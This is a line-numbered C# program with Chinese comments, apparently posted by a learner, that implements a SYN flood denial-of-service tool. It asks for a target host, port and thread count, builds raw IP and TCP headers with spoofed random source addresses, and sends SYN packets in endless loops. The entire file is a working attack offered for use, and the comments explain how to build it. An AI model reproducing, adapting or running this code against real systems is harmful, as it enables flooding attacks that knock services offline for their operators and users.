1. //在工程属性中设置"允许不安全代码"为true
  2. ?using System;
  3. using System.Net;
  4. using System.Net.Sockets;
  5. using System.Threading;
  6. //需要的命名空间不用解释了吧
  7. namespace syn
  8. {
  9.     public struct ipHeader
  10.     {
  11.         public byte ip_verlen; //4位首部长度+4位IP版本号
  12.         public byte ip_tos; //8位服务类型TOS
  13.         public ushort ip_totallength; //16位数据包总长度(字节)
  14.         public ushort ip_id; //16位标识
  15.         public ushort ip_offset; //3位标志位
  16.         public byte ip_ttl; //8位生存时间 TTL
  17.         public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.)
  18.         public ushort ip_checksum; //16位IP首部校验和
  19.         public uint ip_srcaddr; //32位源IP地址
  20.         public uint ip_destaddr; //32位目的IP地址
  21.     }
  22.     public struct psdHeader
  23.     {
  24.         public uint saddr; //源地址
  25.         public uint daddr; //目的地址
  26.         public byte mbz;
  27.         public byte ptcl; //协议类型
  28.         public ushort tcpl; //TCP长度
  29.     }
  30.     public struct tcpHeader
  31.     {
  32.         public ushort th_sport; //16位源端口
  33.         public ushort th_dport; //16位目的端口
  34.         public int th_seq; //32位序列号
  35.         public uint th_ack; //32位确认号
  36.         public byte th_lenres; //4位首部长度/6位保留字
  37.         public byte th_flag; //6位标志位
  38.         public ushort th_win; //16位窗口大小
  39.         public ushort th_sum; //16位校验和
  40.         public ushort th_urp; //16位紧急数据偏移量
  41.     }
  42.     //这3个是ip首部tcp伪首部tcp首部的定义。
  43.     public class syn
  44.     {
  45.         private uint ip;
  46.         private ushort port;
  47.         private EndPoint ep;
  48.         private Random rand;
  49.         private Socket sock;
  50.         private ipHeader iph;
  51.         private psdHeader psh;
  52.         private tcpHeader tch;
  53.         public UInt16 checksum(UInt16[] buffer, int size)
  54.         {
  55.             Int32 cksum = 0;
  56.             int counter;
  57.             counter = 0;
  58. ?
  59.             while (size > 0)
  60.             {
  61.                 UInt16 val = buffer[counter];
  62. ?
  63.                 cksum += Convert.ToInt32(buffer[counter]);
  64.                 counter += 1;
  65.                 size -= 1;
  66.             }
  67. ?
  68.             cksum = (cksum >> 16) + (cksum & 0xffff);
  69.             cksum += (cksum >> 16);
  70.             return (UInt16)(~cksum);
  71.         }
  72.         //这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
  73.         public syn(uint _ip, ushort _port, EndPoint _ep, Random _rand)
  74.         {
  75.             ip = _ip;
  76.             port = _port;
  77.             ep = _ep;
  78.             rand = _rand;
  79.             ipHeader iph = new ipHeader();
  80.             psh = new psdHeader();
  81.             tch = new tcpHeader();
  82.             sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
  83.             sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
  84.             //这2个挺重要,必须这样才可以自己提供ip头
  85.         }
  86.         //传参数的多线程需要用到代构造函数的对象。
  87.         static void Main(string[] args)
  88.         {
  89.             Console.WriteLine("1、输入攻击ip或域名");
  90.             try
  91.             {
  92.                 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
  93.                 uint ip = Convert.ToUInt32(pe.AddressList[0].Address);//这是要攻击的ip并转为网络字节序
  94.                 Console.WriteLine("2、输入攻击端口");
  95.                 ushort port = ushort.Parse(Console.ReadLine());
  96.                 IPEndPoint ep = new IPEndPoint(pe.AddressList[0], port);
  97.                 byte[] bt = BitConverter.GetBytes(port);
  98.                 Array.Reverse(bt);
  99.                 port = BitConverter.ToUInt16(bt, 0);
  100.                 //要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
  101.                 Console.WriteLine("3、输入攻击线程,最多50个");
  102.                 int xiancheng = Int32.Parse(Console.ReadLine());
  103.                 if (xiancheng < 1 || xiancheng > 50)
  104.                 {
  105.                     Console.WriteLine("必须在1到50之间");
  106.                     return;
  107.                 }
  108.                 Random rand = new Random();
  109.                 Thread[] t = new Thread[xiancheng];
  110.                 syn[] sy = new syn[xiancheng];
  111.                 for (int i = 0; i < xiancheng; i++)
  112.                 {
  113.                     sy[i] = new syn(ip, port, ep, rand);
  114.                     t[i] = new Thread(new ThreadStart(sy[i].synFS));
  115.                     t[i].Start();
  116.                 }
  117.                 //一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
  118.             }
  119.             catch
  120.             {
  121.                 Console.WriteLine("有错误,请检查是不是连在网上,或者输入是否都正确");
  122.                 return;
  123.             }
  124. ?
  125. ?
  126.         }
  127.         unsafe public void synFS()
  128.         {
  129.             iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
  130.             //ipv4,20字节ip头,这个固定就是69
  131.             iph.ip_tos = 0;
  132.             //这个0就行了
  133.             iph.ip_totallength = 0x2800;
  134.             //这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
  135.             iph.ip_id = 0x9B18;
  136.             //这个我是拦截ie发送。直接添上来了
  137.             iph.ip_offset = 0x40;
  138.             //这个也是拦截ie的
  139.             iph.ip_ttl = 64;
  140.             //也是拦截ie的,也可以是128什么的。
  141.             iph.ip_protocol = 6;
  142.             //6就是tcp协议
  143.             iph.ip_checksum = UInt16.Parse("0");
  144.             //没计算之前都写0
  145.             iph.ip_destaddr = ip;
  146.             //ip头的目标地址就是要攻击的地址,上面传过来的。
  147.             psh.daddr = iph.ip_destaddr;
  148.             //伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
  149.             psh.mbz = 0;
  150.             //这个据说0就行
  151.             psh.ptcl = 6;
  152.             //6是tcp协议
  153.             psh.tcpl = 0x1400;
  154.             //tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
  155.             tch.th_dport = port;
  156.             //攻击端口号,上面传过来的
  157.             tch.th_ack = 0;
  158.             //第一次发送所以没有服务器返回的序列号,为0
  159.             tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
  160.             //tcp长度
  161.             tch.th_flag = 2;
  162.             //2就是syn
  163.             tch.th_win = ushort.Parse("16614");
  164.             //拦截ie的
  165.             tch.th_sum = UInt16.Parse("0");
  166.             //没计算之前都为0
  167.             tch.th_urp = UInt16.Parse("0");
  168.             //这个连ip都是0,新的攻击方法有改这个值的
  169.             while (true)
  170.             {
  171.                 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255)).Address);
  172.                 psh.saddr = iph.ip_srcaddr;
  173.                 ushort duankou = Convert.ToUInt16(rand.Next(1, 65535));
  174.                 byte[] bt = BitConverter.GetBytes(duankou);
  175.                 Array.Reverse(bt);
  176.                 tch.th_sport = BitConverter.ToUInt16(bt, 0);
  177.                 tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
  178.                 //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
  179. ?
  180. iph.ip_checksum = 0;
  181.                 tch.th_sum = 0;
  182.                 //因为循环中,所以每次必须把这2个已有数的清0才可计算
  183.                 byte[] psh_buf = new byte[sizeof(psdHeader)];
  184.                 Int32 index = 0;
  185.                 index = pshto(psh, psh_buf, sizeof(psdHeader));
  186.                 if (index == -1)
  187.                 {
  188.                     Console.WriteLine("构造tcp伪首部错误");
  189.                     return;
  190.                 }
  191.                 index = 0;
  192.                 byte[] tch_buf = new byte[sizeof(tcpHeader)];
  193.                 index = tchto(tch, tch_buf, sizeof(tcpHeader));
  194.                 if (index == -1)
  195.                 {
  196.                     Console.WriteLine("构造tcp首部错误1");
  197.                     return;
  198.                 }
  199.                 index = 0;
  200.                 byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
  201.                 Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
  202.                 index += psh_buf.Length;
  203.                 Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
  204.                 index += tch_buf.Length;
  205.                 tch.th_sum = chec(tcphe, index);
  206.                 index = 0;
  207.                 index = tchto(tch, tch_buf, sizeof(tcpHeader));
  208.                 if (index == -1)
  209.                 {
  210.                     Console.WriteLine("构造tcp首部错误2");
  211.                     return;
  212.                 }
  213.                 index = 0;
  214.                 byte[] ip_buf = new byte[sizeof(ipHeader)];
  215.                 index = ipto(iph, ip_buf, sizeof(ipHeader));
  216.                 if (index == -1)
  217.                 {
  218.                     Console.WriteLine("构造ip首部错误1");
  219.                     return;
  220.                 }
  221.                 index = 0;
  222.                 byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
  223.                 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
  224.                 index += ip_buf.Length;
  225.                 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
  226.                 index += tch_buf.Length;
  227.                 iph.ip_checksum = chec(iptcp, index);
  228.                 index = 0;
  229.                 index = ipto(iph, ip_buf, sizeof(tcpHeader));
  230.                 if (index == -1)
  231.                 {
  232.                     Console.WriteLine("构造ip首部错误2");
  233.                     return;
  234.                 }
  235.                 index = 0;
  236.                 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
  237.                 index += ip_buf.Length;
  238.                 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
  239.                 index += tch_buf.Length;
  240.                 if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
  241.                 {
  242.                     Console.WriteLine("构造iptcp报文错误");
  243.                     return;
  244.                 }
  245.                 //上面这一大堆东西就是计算校验和的方法了,方法是
  246.                 //1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
  247.                 //2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
  248.                 //3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
  249.                 //4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
  250.                 try
  251.                 {
  252. ?
  253.                     sock.SendTo(iptcp, ep);
  254.                     //构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
  255. ?
  256.                 }
  257.                 catch
  258.                 {
  259.                     Console.WriteLine("发送错误");
  260.                     return;
  261.                 }
  262. ?
  263. ?
  264.             }
  265. ?
  266.         }
  267.         public UInt16 chec(byte[] buffer, int size)
  268.         {
  269.             Double double_length = Convert.ToDouble(size);
  270.             Double dtemp = Math.Ceiling(double_length / 2);
  271.             int cksum_buffer_length = Convert.ToInt32(dtemp);
  272.             UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
  273.             int icmp_header_buffer_index = 0;
  274.             for (int i = 0; i < cksum_buffer_length; i++)
  275.             {
  276.                 cksum_buffer[i] =
  277.                  BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
  278.                 icmp_header_buffer_index += 2;
  279.             }
  280.             UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
  281.             return u_cksum;
  282.         }
  283.         //这个是计算校验,把那些类型不一样的全转为16位字节数组用的
  284.         public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
  285.         {
  286.             Int32 rtn = 0;
  287.             int index = 0;
  288.             byte[] b_verlen = new byte[1];
  289.             b_verlen[0] = iph.ip_verlen;
  290.             byte[] b_tos = new byte[1];
  291.             b_tos[0] = iph.ip_tos;
  292.             byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
  293.             byte[] b_id = BitConverter.GetBytes(iph.ip_id);
  294.             byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
  295.             byte[] b_ttl = new byte[1];
  296.             b_ttl[0] = iph.ip_ttl;
  297.             byte[] b_protol = new byte[1];
  298.             b_protol[0] = iph.ip_protocol;
  299.             byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
  300.             byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
  301.             byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
  302.             Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
  303.             index += b_verlen.Length;
  304.             Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
  305.             index += b_tos.Length;
  306.             Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
  307.             index += b_totallen.Length;
  308.             Array.Copy(b_id, 0, Buffer, index, b_id.Length);
  309.             index += b_id.Length;
  310.             Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
  311.             index += b_offset.Length;
  312.             Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
  313.             index += b_ttl.Length;
  314.             Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
  315.             index += b_protol.Length;
  316.             Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
  317.             index += b_checksum.Length;
  318.             Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
  319.             index += b_srcaddr.Length;
  320.             Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
  321.             index += b_destaddr.Length;
  322.             if (index != size/* sizeof(IcmpPacket) */)
  323.             {
  324.                 rtn = -1;
  325.                 return rtn;
  326.             }
  327. ?
  328.             rtn = index;
  329.             return rtn;
  330. ?
  331.         }
  332.         //这个是把ip部分转为字节数组用的
  333.         public Int32 pshto(psdHeader psh, byte[] buffer, int size)
  334.         {
  335.             Int32 rtn;
  336.             int index = 0;
  337.             byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
  338.             byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
  339.             byte[] b_psh_mbz = new byte[1];
  340.             b_psh_mbz[0] = psh.mbz;
  341.             byte[] b_psh_ptcl = new byte[1];
  342.             b_psh_ptcl[0] = psh.ptcl;
  343.             byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
  344.             Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
  345.             index += b_psh_saddr.Length;
  346.             Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
  347.             index += b_psh_daddr.Length;
  348.             Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
  349.             index += b_psh_mbz.Length;
  350.             Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
  351.             index += b_psh_ptcl.Length;
  352.             Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
  353.             index += b_psh_tcpl.Length;
  354.             if (index != size)
  355.             {
  356.                 rtn = -1;
  357.                 return rtn;
  358.             }
  359.             else
  360.             {
  361.                 rtn = index;
  362.                 return rtn;
  363.             }
  364. ?
  365.         }
  366.         //这个是把tcp伪首部转为字节数组用的
  367.         public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
  368.         {
  369.             Int32 rtn;
  370.             int index = 0;
  371.             byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
  372.             byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
  373.             byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
  374.             byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
  375.             byte[] b_tch_lenres = new byte[1];
  376.             b_tch_lenres[0] = tch.th_lenres;
  377.             byte[] b_tch_flag = new byte[1];
  378.             b_tch_flag[0] = tch.th_flag;
  379.             byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
  380.             byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
  381.             byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
  382.             Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
  383.             index += b_tch_sport.Length;
  384.             Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
  385.             index += b_tch_dport.Length;
  386.             Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
  387.             index += b_tch_seq.Length;
  388.             Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
  389.             index += b_tch_ack.Length;
  390.             Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
  391.             index += b_tch_lenres.Length;
  392.             Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
  393.             index += b_tch_flag.Length;
  394.             Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
  395.             index += b_tch_win.Length;
  396.             Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
  397.             index += b_tch_sum.Length;
  398.             Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
  399.             index += b_tch_urp.Length;
  400.             if (index != size)
  401.             {
  402.                 rtn = -1;
  403.                 return rtn;
  404.             }
  405.             else
  406.             {
  407.                 rtn = index;
  408.                 return rtn;
  409.             }
  410.         }
  411.         //这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
  412.     }



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